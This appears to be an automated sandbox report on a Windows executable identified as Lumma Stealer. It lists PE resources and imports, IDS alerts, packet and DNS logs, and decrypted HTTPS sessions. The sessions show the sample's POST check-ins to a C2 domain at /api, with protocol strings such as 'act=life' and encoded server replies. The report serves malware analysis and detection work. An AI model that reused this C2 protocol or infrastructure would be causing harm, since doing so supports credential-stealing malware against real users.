                .rsrc0xc70000x648000x6480092acf97160db11f756a722c1a45a2f5cFalse0.7837132695895522data7.412232978144714IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0xc74340x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 30236 x 30236 px/m0.0722080918017272
                RT_STRING0xd7c5c0x360data0.34375
                RT_STRING0xd7fbc0x260data0.3256578947368421
                RT_STRING0xd821c0x45cdata0.4068100358422939
                RT_STRING0xd86780x40cdata0.3754826254826255
                RT_STRING0xd8a840x2d4data0.39226519337016574
                RT_STRING0xd8d580xb8data0.6467391304347826
                RT_STRING0xd8e100x9cdata0.6410256410256411
                RT_STRING0xd8eac0x374data0.4230769230769231
                RT_STRING0xd92200x398data0.3358695652173913
                RT_STRING0xd95b80x368data0.3795871559633027
                RT_STRING0xd99200x2a4data0.4275147928994083
                RT_RCDATA0xd9bc40x10data1.5
                RT_RCDATA0xd9bd40x2c4data0.6384180790960452
                RT_RCDATA0xd9e980x2cdata1.1818181818181819
                RT_GROUP_ICON0xd9ec40x14data1.15
                RT_VERSION0xd9ed80x584dataEnglishUnited States0.3024079320113314
                RT_MANIFEST0xda45c0x726XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4005464480874317

                Imports

                DLLImport
                kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                comctl32.dllInitCommonControls
                version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                advapi32.dllRegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

                Exports

                NameOrdinalAddress
                TMethodImplementationIntercept30x454060
                __dbk_fcall_wrapper20x40d0a0
                dbkFCallWrapperAddr10x4be63c

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Suricata IDS Alerts

                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                2024-07-24T21:02:11.193926+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49713443192.168.2.8188.114.97.3
                2024-07-24T21:02:08.812047+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49708443192.168.2.8188.114.97.3
                2024-07-24T21:02:09.799712+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49711443192.168.2.8188.114.97.3

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 24, 2024 21:02:07.514338970 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:07.514378071 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:07.514448881 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:07.517832041 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:07.517843962 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.053843975 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.054014921 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.056812048 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.056828976 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.057094097 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.112463951 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.135540962 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.135572910 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.135834932 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.812072992 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.812165022 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.812257051 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.814640045 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.814659119 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.814682961 CEST49708443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.814687967 CEST44349708188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.831197023 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.831233978 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:08.831335068 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.832108021 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:08.832123041 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.352410078 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.352509022 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.353883028 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.353893995 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.354125023 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.355433941 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.355464935 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.355490923 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.799786091 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.800930977 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.801012993 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.801043987 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.801073074 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.801120043 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.802050114 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.803735018 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.803803921 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.803848982 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.808708906 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.808746099 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.808753014 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.808774948 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.808809996 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.808829069 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.808835983 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.808870077 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.896528959 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.896856070 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.896919012 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.897876978 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.897898912 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:09.897912025 CEST49711443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:09.897917986 CEST44349711188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:10.186110020 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:10.186151981 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:10.186773062 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:10.188802004 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:10.188817024 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:10.687185049 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:10.687398911 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:10.688767910 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:10.688777924 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:10.689131021 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:10.702255011 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:10.717981100 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:10.718065977 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.193938017 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.194063902 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.194117069 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.194216013 CEST49713443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.194232941 CEST44349713188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.395792007 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.395837069 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.395919085 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.396244049 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.396256924 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.858603001 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.858719110 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.860260963 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.860271931 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.860959053 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.862921953 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.863069057 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.863097906 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:11.863173962 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:11.863178015 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:12.376367092 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:12.376513004 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:12.376635075 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:12.376890898 CEST49714443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:12.376907110 CEST44349714188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:12.642898083 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:12.642941952 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:12.643286943 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:12.644785881 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:12.644805908 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:13.154426098 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:13.154544115 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:13.156233072 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:13.156250000 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:13.156584978 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:13.158147097 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:13.158273935 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:13.158298969 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:13.158349991 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:13.158358097 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:13.709765911 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:13.709884882 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:13.709966898 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:13.710086107 CEST49715443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:13.710107088 CEST44349715188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:14.106218100 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:14.106259108 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:14.106365919 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:14.106725931 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:14.106738091 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:14.602045059 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:14.602190018 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:14.603596926 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:14.603606939 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:14.603921890 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:14.605289936 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:14.605403900 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:14.605407000 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:15.087675095 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:15.087795019 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:15.087837934 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:15.087934971 CEST49716443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:15.087954044 CEST44349716188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.058363914 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.058407068 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.058471918 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.058785915 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.058799028 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.532149076 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.532279968 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.533781052 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.533797979 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.534229994 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.535712004 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.536498070 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.536550999 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.536613941 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.536657095 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.536674023 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.536760092 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.536876917 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.536974907 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.537014008 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.537130117 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.537168026 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.537290096 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.537318945 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.537348986 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.537439108 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.537473917 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.547272921 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.547425032 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.547472000 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.547487020 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.547518969 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.547677040 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.547714949 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.547750950 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.547780037 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.547858953 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:16.547863960 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:16.547945023 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:18.976685047 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:18.976833105 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:18.977037907 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:18.977037907 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:19.091675997 CEST49718443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:19.091730118 CEST44349718188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:19.091814995 CEST49718443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:19.092163086 CEST49718443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:19.092185020 CEST44349718188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:19.284421921 CEST49717443192.168.2.8188.114.97.3
                Jul 24, 2024 21:02:19.284451008 CEST44349717188.114.97.3192.168.2.8
                Jul 24, 2024 21:02:19.456787109 CEST49718443192.168.2.8188.114.97.3

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 24, 2024 21:02:07.491297007 CEST4929553192.168.2.81.1.1.1
                Jul 24, 2024 21:02:07.508343935 CEST53492951.1.1.1192.168.2.8
                Jul 24, 2024 21:02:35.260690928 CEST5361041162.159.36.2192.168.2.8
                Jul 24, 2024 21:02:36.237662077 CEST53563881.1.1.1192.168.2.8

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 24, 2024 21:02:07.491297007 CEST192.168.2.81.1.1.10x8bcfStandard query (0)closedjuruwk.shopA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 24, 2024 21:02:07.508343935 CEST1.1.1.1192.168.2.80x8bcfNo error (0)closedjuruwk.shop188.114.97.3A (IP address)IN (0x0001)false
                Jul 24, 2024 21:02:07.508343935 CEST1.1.1.1192.168.2.80x8bcfNo error (0)closedjuruwk.shop188.114.96.3A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • closedjuruwk.shop

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.849708188.114.97.34437724C:\Users\user\Desktop\7Y18r(97).exe
                TimestampBytes transferredDirectionData
                2024-07-24 19:02:08 UTC264OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: closedjuruwk.shop
                2024-07-24 19:02:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                Data Ascii: act=life
                2024-07-24 19:02:08 UTC806INHTTP/1.1 200 OK
                Date: Wed, 24 Jul 2024 19:02:08 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=enplkqpgsf30fgrb801fj504d8; expires=Sun, 17-Nov-2024 12:48:47 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzxL0dNTUWqQ5HHyEq6hfJ9myWvzZGLor0l6nOxyCGxiwFh3IE2XeolZHEEh1plCC6TmxSizm%2FjnZLeRv7teJ1JVgCFLKaOJvkYSbHCHIcxaG6jT4OP9P8I%2F9659bN%2FKyQk%2BPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a8629ad299c42cc-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-24 19:02:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                Data Ascii: 2ok
                2024-07-24 19:02:08 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.849711188.114.97.34437724C:\Users\user\Desktop\7Y18r(97).exe
                TimestampBytes transferredDirectionData
                2024-07-24 19:02:09 UTC265OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 42
                Host: closedjuruwk.shop
                2024-07-24 19:02:09 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 55 54 45 36 65 59 2d 2d 26 6a 3d
                Data Ascii: act=recive_message&ver=4.0&lid=UTE6eY--&j=
                2024-07-24 19:02:09 UTC804INHTTP/1.1 200 OK
                Date: Wed, 24 Jul 2024 19:02:09 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=d29m5mqhe1m2sd1c0vl26r3u4i; expires=Sun, 17-Nov-2024 12:48:48 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DXPg59Yd0HMgI56ELIqzpbtwYt616HCAV1AWD9CWwaWZ%2BjZdIsB9KYXHLWlwCGd0q7ZicoMpGtIGf%2BZSrT7jMydORvQ4nkEqfH5wmYeThs6m3%2FAjHdEmtNMMV17NjCgCvRwhWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a8629b4ec0042e5-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-24 19:02:09 UTC565INData Raw: 34 65 34 0d 0a 68 55 76 67 52 77 64 59 65 69 30 45 45 75 50 56 65 33 50 54 4a 6f 38 31 2f 63 73 34 49 42 6f 52 65 42 75 56 6c 72 38 7a 54 42 37 2b 61 5a 5a 6c 50 57 78 57 44 33 64 33 77 65 38 50 41 61 5a 44 6f 78 65 63 72 78 6f 61 66 48 41 55 61 50 43 36 6e 55 55 68 50 4c 38 74 67 53 74 30 50 56 59 50 59 57 72 42 37 79 41 49 38 55 50 68 46 38 66 70 58 55 70 34 63 42 52 35 39 50 33 51 51 79 42 39 37 53 65 48 4c 32 49 37 48 6b 78 6f 66 34 61 77 48 68 4b 35 53 4f 5a 59 6c 61 59 61 44 44 68 30 41 6a 6d 76 74 50 4a 57 4f 48 2f 49 4b 70 4d 73 4a 53 56 57 56 69 5a 33 6a 66 64 42 55 62 4a 44 37 56 6d 62 72 31 4e 49 63 6e 6b 63 65 50 48 38 7a 31 6f 71 64 75 30 70 68 43 35 6f 4d 67 70 42 59 6e 69 4e 74 68 51 53 38 51 71 74 55 49 66 70 41 67 49 72 51 52 6c 6f 35 75
                Data Ascii: 4e4hUvgRwdYei0EEuPVe3PTJo81/cs4IBoReBuVlr8zTB7+aZZlPWxWD3d3we8PAaZDoxecrxoafHAUaPC6nUUhPL8tgSt0PVYPYWrB7yAI8UPhF8fpXUp4cBR59P3QQyB97SeHL2I7Hkxof4awHhK5SOZYlaYaDDh0AjmvtPJWOH/IKpMsJSVWViZ3jfdBUbJD7Vmbr1NIcnkcePH8z1oqdu0phC5oMgpBYniNthQS8QqtUIfpAgIrQRlo5u
                2024-07-24 19:02:09 UTC694INData Raw: 61 7a 51 66 57 53 5a 76 7a 36 35 5a 46 72 30 45 74 52 65 52 72 46 56 51 65 57 45 66 64 2b 58 34 32 46 63 6a 66 2b 6b 70 68 79 4a 6f 4e 42 35 49 5a 58 69 46 74 68 63 64 75 30 66 70 56 4e 2f 6e 47 6b 56 67 4d 30 49 35 78 76 66 5a 56 6a 78 2f 36 57 6d 64 61 33 78 36 48 30 4d 6d 4b 4d 47 39 48 78 79 34 54 2b 70 66 6b 37 74 52 54 58 74 36 48 58 2f 39 39 39 56 62 4b 48 4c 6d 4c 6f 63 69 64 7a 51 54 51 6d 56 36 68 2f 64 58 55 62 5a 63 72 51 2f 66 68 31 6c 54 62 6b 45 5a 61 4f 61 30 77 68 38 33 50 4f 41 6c 77 6e 30 6c 4d 78 42 41 61 33 32 4c 75 52 77 63 75 45 58 73 57 70 6d 69 57 30 70 77 64 78 31 35 38 2f 6e 53 58 79 35 79 37 79 79 47 4c 32 78 36 56 67 39 68 61 4d 48 76 57 53 47 38 53 4f 5a 62 33 5a 78 5a 54 48 5a 30 44 44 6e 6f 75 73 51 52 4b 58 43 6e 63 63 49
                Data Ascii: azQfWSZvz65ZFr0EtReRrFVQeWEfd+X42Fcjf+kphyJoNB5IZXiFthcdu0fpVN/nGkVgM0I5xvfZVjx/6Wmda3x6H0MmKMG9Hxy4T+pfk7tRTXt6HX/999VbKHLmLocidzQTQmV6h/dXUbZcrQ/fh1lTbkEZaOa0wh83POAlwn0lMxBAa32LuRwcuEXsWpmiW0pwdx158/nSXy5y7yyGL2x6Vg9haMHvWSG8SOZb3ZxZTHZ0DDnousQRKXCnccI
